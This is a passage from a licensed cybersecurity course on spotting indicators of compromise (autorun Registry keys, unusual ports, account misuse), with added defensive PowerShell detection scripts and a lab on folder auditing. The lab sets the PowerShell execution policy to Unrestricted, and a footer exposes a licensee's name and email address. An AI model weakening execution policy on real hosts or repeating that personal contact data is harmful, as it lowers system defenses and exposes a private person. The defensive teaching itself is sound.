• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Note: Older versions of Windows may also have RunServices and RunServicesOnce entries.

Figure 9-16: A suspicious key in the Registry's Run entry.

Another common tactic for malware is to change file associations in the Registry, especially the
association of executable and shell-type files like EXEs, BATs, COMs, CMDs, and more. A user
double-clicks a file with any of these extensions, expecting it to open in a certain program, but
instead it's opened by rogue software that further compromises the computer. File extension
Registry entries are located in HKEY_CLASSES_ROOT (HKCR), which merges the file
extension entries in HKLM and HKCU\SOFTWARE\Classes.

Malware can also modify Registry entries that work with the system's running drivers and services.
An unrecognizable entry, or an entry with suspicious key data, may indicate the malicious software is
running stealthily in the background to avoid detection. These Registry entries are found in
HKLM\SYSTEM\CurrentControlSet\Services.

Note: It's best to edit the Registry while Windows is loaded in Safe Mode to prevent unwanted
applications from starting automatically.
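
The following PowerShell script is an added example, not part of the course: it walks the Run/RunOnce keys and the Services key listed above, resolves each value to the executable it launches, and reports entries that are unsigned, missing from disk, or stored outside the Windows and Program Files directories. The list of "expected" directories is an assumption; adjust it to your own build.

```powershell
# Added example, not part of the course: list Run/RunOnce values and service
# image paths, resolve each to its executable, and flag entries that are
# unsigned, missing, or stored outside the usual program directories.
# Run from an elevated prompt; HKCU reflects only the current user.

$AutorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Assumed: legitimately installed binaries live under one of these roots.
$ExpectedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Resolve-ImagePath {
    # Turn a command line or ImagePath into the on-disk executable. Service
    # entries may use kernel-style prefixes (\SystemRoot\, \??\) or be relative
    # to the Windows directory, so normalize those as well.
    param([string]$CommandLine)
    $Exe = if ($CommandLine -match '^\s*"([^"]+)"') { $Matches[1] }
           elseif ($CommandLine -match '^\s*(\S+?\.(exe|sys|dll|bat|cmd|com))(\s|$)') { $Matches[1] }
           else { ($CommandLine.Trim() -split '\s+')[0] }
    $Exe = [Environment]::ExpandEnvironmentVariables($Exe)
    $Exe = $Exe -replace '^\\\?\?\\', ''
    $Exe = $Exe -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if ($Exe -match '^(system32|SysWOW64)\\') { $Exe = Join-Path $env:SystemRoot $Exe }
    return $Exe
}

function Test-InExpectedDir {
    param([string]$Path)
    foreach ($Root in $ExpectedRoots) {
        $Prefix = $Root.TrimEnd('\') + '\'    # so C:\WindowsEvil does not pass as C:\Windows
        if ($Path.StartsWith($Prefix, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Get-SignatureStatus {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return 'FileMissing' }
    return (Get-AuthenticodeSignature -FilePath $Path).Status.ToString()
}

function New-Finding {
    param([string]$Source, [string]$Name, [string]$Command)
    $Exe = Resolve-ImagePath -CommandLine $Command
    [pscustomobject]@{
        Source        = $Source
        Name          = $Name
        Command       = $Command
        Executable    = $Exe
        InExpectedDir = Test-InExpectedDir -Path $Exe
        Signature     = Get-SignatureStatus -Path $Exe
    }
}

function Get-AutorunEntries {
    foreach ($Key in $AutorunKeys) {
        if (-not (Test-Path -LiteralPath $Key)) { continue }
        $Item = Get-Item -LiteralPath $Key
        foreach ($Name in $Item.GetValueNames()) {
            $Command = [string]$Item.GetValue($Name)
            if ($Command) { New-Finding -Source $Key -Name $Name -Command $Command }
        }
    }
}

function Get-ServiceEntries {
    foreach ($Sub in (Get-ChildItem -LiteralPath $ServicesKey -ErrorAction SilentlyContinue)) {
        $ImagePath = [string]$Sub.GetValue('ImagePath')
        # Keys without an ImagePath hold driver parameters, not a binary to check.
        if ($ImagePath) {
            New-Finding -Source $Sub.PSChildName -Name ([string]$Sub.GetValue('DisplayName')) -Command $ImagePath
        }
    }
}

# Anything unsigned, pointing at a missing file, or outside the expected roots deserves a closer look.
@(Get-AutorunEntries) + @(Get-ServiceEntries) |
    Where-Object { -not $_.InExpectedDir -or $_.Signature -ne 'Valid' } |
    Sort-Object Source, Name |
    Format-Table Source, Name, Executable, Signature -AutoSize
```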

Unknown Port and Protocol Usage


When it comes to TCP/UDP ports, some malware has been known to use certain ports, but
unfortunately there's no definitive or comprehensive list. Malware writers easily adapt and change
how their software communicates, which is why many administrators implement a whitelist at the
firewall. Still, certain ranges of ports are more likely to indicate a compromise. The dynamic and
private range (49152–65535) can't be registered with the Internet Assigned Numbers Authority
(IANA) and is typically used by protocols for temporary communication sessions. If an unknown
open port in this range appears constant on a host, it may indicate a channel that's carrying
malicious traffic.

Still, even the range of registered ports (1024–49151) is used for malicious communications.
Although an unknown protocol could clash with the protocol that's actually registered, chances are
the host isn't necessarily using the registered protocol. So, malware could initiate a connection over a
registered port without any conflict. For example, Internet Relay Chat (IRC) is registered on port
6660, but the W32.Spybot.OBZ worm has been known to launch DDoS attacks on this port.

Note: Ensure students understand the different ports used in each side of a connection. The
server port is usually in the well-known range (0–1023), but the client port is usually in the
ephemeral range (1024–65535).

Figure 9-17: Using netstat to enumerate network sockets. Notice that the host is listening on
several ports within the dynamic and private range.

Although open ports in the well-known range (0–1023) can still carry malware, their being open
won't necessarily be an IOC. Your organization will need to keep ports 80 and 443 open, for
example, despite the threat of worms and other malicious software. So it then falls to you to analyze
how the main protocols are used. Assume that you have a File Transfer Protocol (FTP) server set up
with transport encryption (FTPS) for remote employees to both upload and download files.
Naturally, ports 989 and 990 will be open on the FTP server itself. But you also notice that some of
the back-end servers in your organization are communicating over FTPS, despite the fact they have
no reason to. This unexpected outbound communication could indicate the legitimate FTPS
protocol is being used maliciously to move sensitive data to the FTPS server where it can be
exfiltrated by a remote client.

Note: You can look up suspicious ports on https://www.speedguide.net/ports.php to see if
that port is known to be used for malicious purposes.
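
As an added example (not from the course), this PowerShell script does what the netstat screenshot shows by hand: it lists listeners in the dynamic and private range with their owning process, lists established connections to remote ports this host should not be using (989/990 from the FTPS scenario is the assumed set), and compares the listeners against a saved baseline so that a port that keeps appearing stands out. The baseline file location is hypothetical.

```powershell
# Added example, not part of the course: what the netstat screenshot shows by
# hand, with the owning process attached and a baseline to compare against.
# Needs Get-NetTCPConnection (Windows 8 / Server 2012 and later); run
# elevated so that process image paths are readable.

$DynamicStart = 49152                     # dynamic and private range, per IANA
$DynamicEnd   = 65535
$UnexpectedRemotePorts = @(989, 990)      # assumed: only the FTPS server itself should use these
$BaselinePath = "$env:ProgramData\listener-baseline.json"   # hypothetical location

function Get-OwningProcess {
    param([int]$ProcessId)
    $Proc = Get-Process -Id $ProcessId -ErrorAction SilentlyContinue
    if ($Proc) { return [pscustomobject]@{ Name = $Proc.ProcessName; Path = $Proc.Path } }
    return [pscustomobject]@{ Name = "pid $ProcessId (exited)"; Path = $null }
}

function Get-DynamicRangeListeners {
    Get-NetTCPConnection -State Listen |
        Where-Object { $_.LocalPort -ge $DynamicStart -and $_.LocalPort -le $DynamicEnd } |
        ForEach-Object {
            $Owner = Get-OwningProcess -ProcessId $_.OwningProcess
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                Process      = $Owner.Name
                ImagePath    = $Owner.Path
            }
        }
}

function Get-UnexpectedOutbound {
    # The FTPS scenario above: a back-end server talking to 989/990 has no reason to.
    Get-NetTCPConnection -State Established |
        Where-Object { $UnexpectedRemotePorts -contains $_.RemotePort } |
        ForEach-Object {
            $Owner = Get-OwningProcess -ProcessId $_.OwningProcess
            [pscustomobject]@{
                RemoteAddress = $_.RemoteAddress
                RemotePort    = $_.RemotePort
                Process       = $Owner.Name
                ImagePath     = $Owner.Path
            }
        }
}

function Compare-ListenerBaseline {
    # RPC and several Windows services legitimately listen in this range, so a
    # listener is interesting when it is new relative to a known-good snapshot.
    param([object[]]$Current, [string]$Path)
    $Keys = @($Current | ForEach-Object { "$($_.LocalPort)|$($_.Process)" })
    if (-not (Test-Path -LiteralPath $Path)) {
        ConvertTo-Json -InputObject $Keys | Set-Content -LiteralPath $Path
        Write-Host "No baseline yet; saved $($Keys.Count) listeners to $Path"
        return @()
    }
    $Baseline = @(Get-Content -LiteralPath $Path -Raw | ConvertFrom-Json)
    return @($Keys | Where-Object { $Baseline -notcontains $_ })
}

$Listeners = @(Get-DynamicRangeListeners)
Write-Host "Listening in ${DynamicStart}-${DynamicEnd}:"
$Listeners | Format-Table -AutoSize | Out-Host
Write-Host "Established connections to unexpected remote ports:"
Get-UnexpectedOutbound | Format-Table -AutoSize | Out-Host
Write-Host "Listeners not in the baseline (port|process):"
Compare-ListenerBaseline -Current $Listeners -Path $BaselinePath
```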

Excessive Bandwidth Usage


At some point, you or your team should create a baseline for network performance. Although the
bandwidth usage of your network may fluctuate from day to day, it will usually hover around the
same range. If that range is exceeded in a small period of time (e.g., a few seconds), or even if you
notice an increasing trend over a larger period of time (e.g., a few weeks), it could indicate that a
malicious user or service is using your network in unauthorized ways.

When it comes to malware, worms consume bandwidth more than just about any other type. Their
purpose is to spread through network channels fairly quickly, and even if their payload is small, their
rapid propagation could congest the entire network. The other type of malware that impacts
bandwidth substantially is a bot infection. If attackers have compromised hosts in your network by
turning them into zombies for a larger botnet, they could be sending massive amounts of traffic to
external hosts as part of a DDoS attack. In either case, users may experience lag or other latency
issues when they attempt to access a network share or a resource on the Internet. Likewise, your
automated network monitoring tools should detect unusual traffic spikes and generate an alert when
that traffic usage crosses a certain threshold.

Bandwidth-related IOCs don't always point to malware, however. If your network is experiencing
bandwidth issues, it may be the target of an ongoing DDoS attack from either internal or external
hosts. These attacks are noticeable because they often target public-facing resources like web servers
to deny service not just to the organization, but to its customers as well. So it becomes easier to
determine whether a bandwidth-related IOC is an actual compromise when you consider both the
source and the destination of the excessive traffic.

Figure 9-18: Using iPerf to measure network bandwidth usage.

Service Disruption and Defacement

Excessive bandwidth usage will accompany most service disruption, but this isn't always the case.
Attackers can take down servers by gaining control over them, not just by flooding them with
network traffic. For example, an attacker who is able to move laterally to a domain controller (DC)
by exploiting a golden ticket may be able to shut down the Active Directory service, which could
cause authentication to fail for users accessing other services in the network. The attacker could also
move to individual servers and cut them off from the wider network. If your administrators usually
tunnel into an application server using Secure Shell (SSH), and now find that their connections are
being interrupted or denied, it could indicate that an attacker was able to stop the SSH service on
the application server. Keep in mind that service disruption is difficult to diagnose, and is often
mistakenly thought to be an IOC when it may in fact be a maintenance issue.

One of the most overt and definite signs of a compromise is when a service like a website is
defaced. Attackers may exploit Structured Query Language (SQL) injection weaknesses or gain
control of the web server itself to alter the site's presentation. Most defacements aren't very subtle,
as the attacker usually wants their work to be recognized. So, the site will often stand out to even
those that have never visited it—this may include simplistic text and a background with eye-catching
colors; text that taunts the organization or its users; graffiti on legitimate images; irrelevant or
foreign images that identify the attacker's affiliation or political beliefs; and scripts or links that inject
malware onto a visitor's computer. Some defacement attacks are more subtle, however, and may
simply sneak in an ironic modification of text or an image that isn't easily noticeable. These types of
defacement attacks are meant to confuse users into believing that the organization is responsible for
the offending material, and not some malicious hacker.


Figure 9-19: In one of the most well-known incidents, a group of attackers defaced the
promotion site for the 1995 film "Hackers."

Note: Other than disruption and defacement being IOCs themselves, some IOCs like a change
to a server configuration at an unusual time can indicate a disruption and/or defacement attack.

Rogue Hardware

Rogue hardware is any unauthorized piece of electronic equipment attached to a network or assets
in an organization. A Universal Serial Bus (USB) thumb drive may be attached to a web server to
siphon sensitive data. An extra network interface controller (NIC) may be installed on an employee's
workstation to create a side channel for an attack. An employee's personal smartphone may be
connected to the network, exposing the network to malware. A new MAC address might appear on
the network used as an attack platform. These situations could indicate a compromise, but much of
that determination will depend on your existing security policies and the context of the situation.
Ultimately, truly rogue hardware is designed to exploit organizations' tendencies to secure their
logical infrastructure while neglecting their physical one.

One of the most common types of rogue hardware is a rogue wireless access point (WAP). Anyone
with access to your network can create a WAP, even from a non-specialized device like a laptop.
They can intentionally mislead others into connecting to their rogue access point (called an evil
twin), which then opens the door for a man-in-the-middle attack on unsuspecting users. The signs
of a rogue WAP may include unknown or unidentifiable service set identifiers (SSIDs) showing up
within range of the office; lost or malformed traffic within the network; and devices appearing in the
building that are unaccounted for.

Rogue hardware is a major reason why you should have an inventory of all devices in your
organization.

Suspicious or Unauthorized Account Usage


Security teams frequently monitor authentication and authorization systems because of how much
valuable information they can provide about the state of access control in the organization.
Attackers prize access above all because it opens many doors across the network, enabling them to
extend the reach and effect of their attack. In doing so, however, they tend to leave traces behind
that will help you detect their malicious behavior. The following list outlines some of the most
common IOCs associated with account usage:
• Unauthorized sessions: As you monitor access, you may see certain accounts access devices or
services they should not be authorized to access. For example, a user with limited privileges may
be signed in to a domain controller. Only administrators should have access to the DC, so this
could indicate unauthorized privilege escalation and compromise of the server.
• Failed logins: When you check access logs, you'll eventually get used to the sight of failed
logins. After all, users forget or mistype their passwords all the time. However, repeated failures
for one account may suggest more than just benign attempts, especially for administrator
accounts. Attackers who try brute-force password cracking will go through hundreds, maybe
thousands of attempts if there are no failure limits set on the system.
• New accounts: Instead of attempting to crack an existing account, an attacker may be able to
create new accounts in a system. You should already be monitoring account creation carefully,
especially in a domain environment where only certain administrators should be able to create
them. Although a new standard user account may indicate a compromise, it is new administrator
accounts that you need to pay special attention to. An attacker with their own high-level
permissions can cause serious damage.
• Guest account usage: In most cases, you should be disabling the guest account on your
systems. However, some systems may slip by, so be sure to monitor your login events for
instances of the guest account. While guest accounts don't have many privileges, they can enable
an attacker to log on to a domain they do not otherwise have access to.
• Off hours usage: Depending on the normal work period in your organization, seeing an account
being used during off hours may indicate an attacker attempting to catch the organization
unaware. For example, if your employees work 9:00 a.m. to 5:00 p.m., and the account for one of
those employees signs in to the virtual private network (VPN) at 3:00 a.m., the account may have
been hijacked. To be sure, you should follow up with the employee.
• "Superhuman" account usage: Certain account behavior may seem anomalous, impossible,
improbable, or just strangely unrealistic. For example, if a user logs in to a system from an IP
address range assigned to the United States, and then minutes later that same account logs in
from an IP address range assigned to the United Kingdom, then you have suspicious behavior
on your hands. The practice of validating whether or not certain account behavior is possible
given the speed of current travel technology is known as geo-velocity.
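
This PowerShell script is an added example, not part of the course, that applies the off-hours and geo-velocity checks above to a set of sign-in records. The records are constructed; in a real deployment they would come from VPN or domain controller logs, with the coordinates filled in from a GeoIP lookup of the source address. The 9-to-5 window and the 900 km/h threshold are assumptions.

```powershell
# Added example, not part of the course: flag off-hours sign-ins and sign-ins
# that would require "superhuman" travel speed between two locations.
# The records below are constructed; Latitude/Longitude would normally come
# from a GeoIP lookup of SourceIp.

$SignIns = @'
Account,Time,SourceIp,Country,Latitude,Longitude
jprice,2019-03-04T09:05:00,203.0.113.25,US,40.71,-74.01
jprice,2019-03-04T09:31:00,198.51.100.9,GB,51.51,-0.13
asmith,2019-03-04T03:12:00,203.0.113.40,US,40.71,-74.01
asmith,2019-03-04T10:00:00,203.0.113.40,US,40.71,-74.01
bchen,2019-03-04T09:15:00,203.0.113.52,US,34.05,-118.24
bchen,2019-03-04T16:40:00,198.51.100.20,US,40.71,-74.01
'@ | ConvertFrom-Csv

$WorkdayStart    = 9       # 9:00 a.m. (assumed normal work period)
$WorkdayEnd      = 17      # 5:00 p.m.
$MaxPlausibleKmh = 900     # roughly airliner speed; anything faster is not plausible travel

function Get-DistanceKm {
    # Great-circle distance (haversine) between two points on the Earth's surface.
    param([double]$Lat1, [double]$Lon1, [double]$Lat2, [double]$Lon2)
    $ToRad = [Math]::PI / 180
    $dLat = ($Lat2 - $Lat1) * $ToRad
    $dLon = ($Lon2 - $Lon1) * $ToRad
    $a = [Math]::Pow([Math]::Sin($dLat / 2), 2) +
         [Math]::Cos($Lat1 * $ToRad) * [Math]::Cos($Lat2 * $ToRad) * [Math]::Pow([Math]::Sin($dLon / 2), 2)
    return 2 * 6371.0 * [Math]::Asin([Math]::Sqrt($a))
}

function Find-SuspiciousSignIns {
    param([object[]]$Records)
    foreach ($Group in ($Records | Group-Object -Property Account)) {
        $Previous = $null
        foreach ($Rec in ($Group.Group | Sort-Object { [datetime]$_.Time })) {
            $When = [datetime]$Rec.Time
            if ($When.Hour -lt $WorkdayStart -or $When.Hour -ge $WorkdayEnd) {
                [pscustomobject]@{
                    Account = $Rec.Account; Time = $When; Indicator = 'Off-hours sign-in'
                    Detail  = "from $($Rec.SourceIp) ($($Rec.Country)) at $($When.ToString('HH:mm'))"
                }
            }
            if ($Previous) {
                $Km    = Get-DistanceKm $Previous.Latitude $Previous.Longitude $Rec.Latitude $Rec.Longitude
                $Hours = ($When - [datetime]$Previous.Time).TotalHours
                # Same place at any interval is fine; distance with no time between
                # the two sign-ins is treated as infinitely fast.
                $Kmh = if ($Hours -gt 0) { $Km / $Hours } else { [double]::PositiveInfinity }
                if ($Km -gt 0 -and $Kmh -gt $MaxPlausibleKmh) {
                    [pscustomobject]@{
                        Account = $Rec.Account; Time = $When; Indicator = 'Geo-velocity'
                        Detail  = "$($Previous.Country) -> $($Rec.Country): $([int]$Km) km in $([int]($Hours * 60)) min ($([int]$Kmh) km/h)"
                    }
                }
            }
            $Previous = $Rec
        }
    }
}

# For the sample: jprice is flagged for New York to London in 26 minutes, asmith for
# a 3:12 a.m. sign-in; bchen's Los Angeles to New York over the working day passes.
Find-SuspiciousSignIns -Records $SignIns | Format-Table -AutoSize
```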

Additional IOCs

The following is a list of additional behaviors that could be indicators of compromise:
• Scan sweeps across the network: An attacker may be attempting to perform reconnaissance
on the network and its hosts. An IDS or a similar system will detect these scans and alert you to
suspicious behavior, assuming the system is calibrated correctly.
• Unusual network traffic that could indicate internal hosts are communicating with a
command and control (C&C) operation: A bot may beacon its C&C server by sending simple
transmissions at regular intervals to unrecognized or malicious domains. Likewise, irregular
peer-to-peer (P2P) traffic in the network could indicate malicious network communications with a
centralized C&C server.
• Unauthorized changes to a host's hardware or software: An attacker may attempt to change
how a device or application behaves to exploit some sort of vulnerability or to open a new vector
through which the attacker can initiate an attack. For example, the attacker may open ports or
start services on a workstation that enables them to take remote control of the host.
• Unexpected output from applications: Assuming you have a baseline for known behavior in
your applications, you may start to see their behavior deviate from the norm. This could be a
symptom of unauthorized changes made to the application by an attacker, or it could suggest the
presence of malware on the host system.
• Memory overflows and other application-crashing errors: One denial of service (DoS) attack
method is to cause an application to overrun its memory buffer to trigger an execution failure.
While software does occasionally crash, repeated failures not attributable to other factors could
indicate a compromise. Testing software in a controlled environment will help you determine if
this truly is an IOC or just a false positive.

Guidelines for Analyzing Indicators of Compromise

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.

Use these guidelines when analyzing potential IOCs.

Analyze Indicators of Compromise

When analyzing IOCs:
• Look out for known malicious software on a system.
• Look for known attack tools/security tools on a system that doesn't need them.
• Watch for modification of legitimate files to facilitate an attack.
• Monitor for keywords or suspicious information in email.
• Monitor for phishing attempts that indicate an actual account compromise.
• Review the startup, file association, and driver/service Registry entries for unknown keys and
values.
• Monitor typically unused ports for suspicious usage.
• Monitor how common ports are used to detect traffic that is using these ports for malicious
purposes.
• Set a baseline for network bandwidth and routinely compare your current bandwidth to this
baseline.
• Monitor key systems like web servers that are common targets for disruption and defacement.
• Bolster physical security to prevent rogue hardware from attaching to the network.
• Monitor account usage carefully for suspicious or unauthorized behavior, like excessive failed
logins or new unknown accounts.
• Monitor the network for reconnaissance scans and botnet communications.
• Monitor hosts and applications for unexpected changes, outputs, and crashes.

ACTIVITY 9-3
Analyzing Indicators of Compromise

Data File

C:\CNX0013Data\Performing Active Asset and Network Analysis\Get-UnusedAccounts.ps1

Before You Begin

In this activity, you'll be using your Windows Server and your Kali Linux VM. A suspicious user
account, testaccount, has already been added to the Active Directory domain. In a prior activity,
"Assessing Data Exfiltration," you created a C:\CurrentProjects\DT_Watch folder on your
server.

Scenario

Your system administrators at Develetech have been seeing strange behavior on the domain
controller and have asked for your help in assessing this behavior. In particular, they've noticed
account activity from accounts they don't recognize. Additionally, the admins have a hunch that key
files may have gone missing, but they can't verify this information and have no way of knowing for
sure. These events may indicate an attacker has compromised the domain controller, but you need
to be certain before you make a call.

So, you'll examine the domain for suspicious user accounts, as well as implement auditing on key
files and folders to help track any access or modification to these sensitive objects. By evaluating
potential IOCs like these, you can more easily identify attacks on your networks and systems.

1. Open the Get-UnusedAccounts.ps1 Windows PowerShell script.

a) From your Windows Server, select the Start button, and then select Windows PowerShell ISE.
b) Select File→Open.
c) Open Get-UnusedAccounts.ps1 from the course data files.

d) Verify that the contents of the script open in the editor.

As the comment indicates, this script will retrieve all Active Directory (AD) accounts in the domain
that have never been logged in and are in an enabled state:
• Get-ADUser is the main cmdlet that retrieves the account information based on the provided
factors.
• The -F parameter (an alias for -Filter) tells the cmdlet to filter its results based on everything
contained within the curly braces.
• The filter has two conditions: the first looks for any accounts whose last logon time is not like any
valid value (using a wildcard), and the second looks for accounts that are enabled. The -and
operator indicates this is a logical AND operation—i.e., both conditions must be true.
• The -Properties * parameter indicates that the cmdlet is looking through all account
properties.
• The Get-ADUser cmdlet is then piped to the Select-Object cmdlet on the next line.
• The Select-Object cmdlet ensures that only three properties of any accounts matching the
filter are returned: the logon count of the user, the name of the account, and the groups the
account is a member of.
e) In the Windows PowerShell prompt at the bottom of the window, enter Set-ExecutionPolicy
Unrestricted
f) In the Execution Policy Change dialog box, select Yes.
g) From the menu, select File→Run.
h) Examine the results and verify that testaccount is listed.


2. What can you conclude about the account listed in the results?

A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.

3. Assuming this account was created or used by an attacker, what could the
attacker have done to make it harder to spot as malicious?

A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less
likely to be monitored or audited.

4. Close Windows PowerShell ISE.


5. Enable auditing of the DT_Watch folder.

a) Navigate to C:\CurrentProjects.
b) Right-click the DT_Watch folder and select Properties.
c) Select the Security tab.
d) Select the Advanced button.
e) Select the Auditing tab.
f) Select the Add button to open the Auditing Entry for DT_Watch dialog box.
g) Select the Select a principal link.
This enables you to define which accounts you want to audit against.
h) In the Enter the object name to select (examples) text box, type Everyone and select the Check
Names button.

i) Verify that Everyone is underlined, indicating that Windows recognizes the group.

j) Select OK.
k) In the Basic permissions section, check the Full control check box.

Note: You are not granting these permissions to use the folder; you are
enabling the usage of these permissions to be recorded.

l) Select OK three times to close each successive dialog box.

6. Enable logging for audited objects.


a) From Server Manager, select Tools→Local Security Policy.
b) In the console tree, select Local Policies→Audit Policy.
c) In the details pane, double-click Audit object access.

d) Check both the Success and Failure check boxes and select OK.


e) Close the Local Security Policy window.


Note: Be prepared to help students remember the following commands they've used before.

7. Remotely access the DT_Watch folder to generate audit logs.

a) Switch to your Kali Linux VM and open an SSH connection to the Windows Server using the
Administrator account.
b) In the shell, navigate to the C:\CurrentProjects\DT_Watch directory.
c) Execute a directory listing.
d) Enter type budget.xls
This command displays the raw data of the workbook file.
e) Enter echo Hello there! > hello.txt to create a new text file in the directory.

f) List the directory's contents and verify that hello.txt is there.

g) Enter del hello.txt to delete the file.
h) Exit the SSH session.

8. Open Event Viewer and examine the audited events.

a) Switch back to your Windows Server 2019 machine.
b) From Server Manager, select Tools→Event Viewer.
c) Expand Windows Logs→Security.
d) In the Actions pane on the right, select Filter Current Log.

e) In the Filter Current Log dialog box, in the <All Event IDs> text box, type 4659

Note: Event ID 4659 is described as "a handle to an object was requested
with intent to delete."

f) Select OK to apply the filter.

g) Verify that Event Viewer selects the lone entry.



h) Review the General tab below the entry and confirm that your deletion of hello.txt was logged.

i) From the Actions pane, select Clear Filter.

j) Review the detailed information about some of the other events that have a Task Category of File
System.

Note: Remember that you can sort, filter, and search the event log.

9. What remote changes did Windows detect to the DT_Watch directory?

A: Windows logged everything associated with accessing the directory, even the directory listing
commands.

Note: If students are curious, they can use Find to search the event log for ReadData (or
ListDirectory). This indicates an attempt to list the contents of the DT_Watch folder.

10. Why is this level of auditing impractical for commonly used folders?

A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to
manage.

11. What type of security solution would be better at detecting unauthorized
changes in files and configurations?

A: Answers may vary, but a host-based intrusion detection system/host-based intrusion prevention
system (HIDS/HIPS) or file integrity monitors (FIMs) are suited to this kind of security control.

12. Consider all of the attacks you've simulated in class so far. What other IOCs might you have left
behind?

A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
levels of ICMP traffic or other networking protocols, unusually high access rates to the
Administrator account, and so on.

13. Close Event Viewer.
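
As an added example (not the course's Get-UnusedAccounts.ps1 and not the lab's own steps), this PowerShell script performs the activity's three checks without the GUI: the never-logged-on enabled account query as described in step 1, the SACL and audit policy from steps 5 and 6, and the Event ID 4659 filter from step 8. The attribute names in the filter are my reading of the description, not a copy of the course file; the script assumes the ActiveDirectory module and administrator rights on the domain controller.

```powershell
# Added example, not the course's Get-UnusedAccounts.ps1 or its lab steps:
# the same three checks as Activity 9-3, scripted so they can be repeated.
# Run on the domain controller as an administrator; Get-ADUser needs the
# ActiveDirectory (RSAT) module. Attribute names follow the description of
# the course script above and are assumptions, not a copy of it.

Import-Module ActiveDirectory

$WatchFolder = 'C:\CurrentProjects\DT_Watch'

function Get-NeverLoggedOnEnabledUsers {
    # An attribute that was never set has nothing for the wildcard to match, so
    # LastLogonDate -notlike "*" selects accounts with no recorded logon.
    Get-ADUser -Filter { LastLogonDate -notlike "*" -and Enabled -eq $true } `
               -Properties LogonCount, LastLogonDate, MemberOf |
        Select-Object LogonCount, Name, MemberOf
}

function Enable-FolderAudit {
    param([string]$Path)
    # Same SACL the lab builds in the Auditing tab: Everyone, Full control,
    # Success and Failure, applied to the folder, its subfolders and files.
    $Rule = New-Object -TypeName System.Security.AccessControl.FileSystemAuditRule `
        -ArgumentList 'Everyone', 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Success,Failure'
    $Acl = Get-Acl -Path $Path -Audit
    $Acl.AddAuditRule($Rule)
    Set-Acl -Path $Path -AclObject $Acl
    # Without the "Audit object access" policy the SACL produces no events.
    auditpol /set /category:"Object Access" /success:enable /failure:enable | Out-Null
}

function Get-DeleteIntentEvents {
    # 4659: a handle to an object was requested with intent to delete.
    param([string]$Path)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4659 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $Data = @{}
            foreach ($Field in ([xml]$_.ToXml()).Event.EventData.Data) { $Data[$Field.Name] = $Field.'#text' }
            [pscustomobject]@{
                Time   = $_.TimeCreated
                User   = "$($Data['SubjectDomainName'])\$($Data['SubjectUserName'])"
                Object = $Data['ObjectName']
            }
        } |
        Where-Object { $_.Object -like "$Path*" }
}

Get-NeverLoggedOnEnabledUsers | Format-Table -AutoSize
Enable-FolderAudit -Path $WatchFolder
Get-DeleteIntentEvents -Path $WatchFolder | Format-Table -AutoSize
```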



Summary
In this lesson, you actively analyzed your network, systems, and other assets in order to catch
malicious behavior quickly and effectively. You used Windows and Linux as platforms to detect
these attacks. You then assessed how various situations and scenarios could indicate a compromise,
even if the signs aren't overt.

Note: Encourage students to use the social networking tools provided on the CHOICE Course
screen to follow up with their peers after the course is completed for further discussion and
resources to support continued learning.

Which operating system platform(s) do you see yourself using most to analyze attack behavior?

A: Answers will vary. Students who work in organizations that employ Windows domains may stick with
Windows-based tools and techniques, as these are the types of systems they need to protect. Still,
plenty of Linux tools can analyze attacks on Windows computers, not to mention being fundamental
to securing the Linux servers they may have. In all, it's likely students will be working at least
somewhat with both platforms, even if they work more heavily with one. Students' answers may also
depend on their comfort level with each platform's command-line syntax.

What are some of the most common IOCs you've seen in your organization or
an organization you're familiar with?

A: Answers will vary. The presence of malware is often a major IOC in any organization. Some students
may have experience with service disruption or defacement, while others may be used to more subtle
indicators like network traffic usage and file modification. Rogue accounts and other suspicious
access control behaviors are also common signs that a system or network is under attack.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
at
lic
up
D
ot
N
o
D

Lesson 9: Performing Active Asset and Network Analysis |


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
10 Responding to Cybersecurity Incidents

Lesson Time: 2 hours, 45 minutes

Lesson Introduction
Now that you've performed a comprehensive analysis of your network and other assets, you
need to prepare for what much of this analysis will reveal—the reality of a security incident
affecting your organization. Responding quickly, yet cautiously, to the inevitable can make
all the difference in preventing serious, long-term harm to the organization.

Lesson Objectives
In this lesson, you will:
• Design and implement a system to respond to urgent situations by mitigating immediate
and potential threats.
• Employ various protection, prevention, and containment countermeasures to mitigate
the effect of incidents.
• Hand over information learned from an incident to a forensic investigation team for
post-mortem analysis.


TOPIC A
Deploy an Incident Handling and Response Architecture
When you have to respond to an incident, you will be able to respond more efficiently and
effectively if you already have the right processes, personnel, and tools in place.

Incident Handling and Response Planning
Before a security incident occurs, your organization should plan and implement an incident handling
capability that includes skills, roles, procedures, processes, and tools to respond to security incidents.
Your goal should be to design an incident response plan that enables you to:
• Detect compromises as quickly and efficiently as possible.
• Respond to incidents as quickly as possible.
• Identify the cause as effectively as possible.
In response to a security incident, your organization should do the following:
• Secure data, while limiting the immediate impact on customers and business partners.
• Contain the incident, preventing any further escalation.
• Identify how the incident occurred.
